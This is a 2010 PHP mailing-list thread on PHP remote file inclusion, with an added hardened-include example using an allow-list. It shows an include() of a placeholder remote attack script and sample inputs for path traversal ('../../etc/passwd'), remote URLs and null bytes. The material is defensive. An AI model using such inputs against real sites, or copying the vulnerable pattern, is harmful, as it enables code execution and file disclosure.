Yes, and scrubbing the input to ensure the field used for this URL
rejects certain characters or does sanity checking on it would also be
another suggestion. Turning this off would fix remote include
requests, but you still need to check for people requesting local files.
You should never take user input and put it directly into include or shell
execs or anything.
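As an added illustration of the advice in this reply (example code written for this page, not code posted by anyone in the thread): the vulnerable pattern is shown commented out, and the hardened version resolves a request parameter against a fixed allow-list of page names instead of passing it to include. The directory name PAGE_DIR, the ALLOWED_PAGES list, the function names and the pages/*.php files are all assumptions made for the example.

```php
<?php
// Added example, not from the thread. Contrasts passing a request parameter
// straight into include() with resolving it against a fixed allow-list.

// --- vulnerable pattern discussed in the thread (kept commented out) ---
// include($_GET['page']);
// With allow_url_include=On this can load a remote script; even with it Off,
// a value such as ../../etc/passwd still includes a local file.

// --- hardened version (names below are assumptions for this example) ---
const PAGE_DIR = __DIR__ . '/pages';                 // assumed location of page files
const ALLOWED_PAGES = ['home', 'about', 'contact'];  // assumed allow-list of page names

function resolve_page(string $requested): ?string {
    // Accept only a short alphanumeric token as a page name. This rejects
    // '/', '\\', ':', '.', and NUL bytes before any filesystem call is made.
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $requested)) {
        return null;
    }
    // Allow-list: the user picks from known names and never supplies a path.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // Defense in depth: confirm the resolved file really lives under PAGE_DIR.
    // Returns null unless pages/<name>.php actually exists on disk.
    $base = realpath(PAGE_DIR);
    $real = realpath(PAGE_DIR . '/' . $requested . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Report the interpreter settings the thread discusses, as booleans.
function remote_include_settings(): array {
    return [
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
    ];
}

// Demonstration on constructed inputs: only 'home' can pass, and only if
// pages/home.php exists; the others are rejected before touching the filesystem.
$constructed_inputs = ['home', '../../etc/passwd', 'http://example.invalid/x.txt', "home\0.jpg"];
foreach ($constructed_inputs as $input) {
    echo var_export($input, true), ' => ', var_export(resolve_page($input), true), PHP_EOL;
}
echo 'settings: ', json_encode(remote_include_settings()), PHP_EOL;

// Typical use in a request handler:
$page = resolve_page($_GET['page'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

The regular expression does the real work: once the parameter can only be a short token, neither a remote URL nor a path with separators can reach include, regardless of the allow_url_include setting. The realpath check is a second line of defence in case the allow-list is later loosened.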
On Jun 8, 2010, at 11:55 AM, "David Stoltz" <Dstoltz@xxxxxxx> wrote:
allow_url_include is (or should be) disabled by default.
http://us2.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include
I can't think of one good reason to ever enable this, it would be a
security issue no matter how you slice it...
-----Original Message-----
From: Igor Escobar [mailto:titiolinkin@xxxxxxxxx]
Sent: Tuesday, June 08, 2010 10:11 AM
To: richgray@xxxxxxxxx
Cc: <php-general@xxxxxxxxxxxxx>
Subject: Re: Security Issue
Hey Richard,
I'll find more about this parameter allow_url_include, thank you!
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 5:26 PM, richard gray <rich@xxxxxxxxxxxx>
wrote:
On 07/06/2010 20:00, Igor Escobar wrote:
PHP Injection is the technical name given to a security hole in PHP
applications. When this gap exists, a hacker can use external code
that is interpreted as inner code, as if the included code were part
of the script.
// my code...
// my code...
include ('http://..../externalhackscript.txt');
//my code...
//my code..
can you not switch off remote file includes in php.ini?
This will stop include/require from a remote host..
i.e. allow_url_include = Off in php.ini
HTH
Rich
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php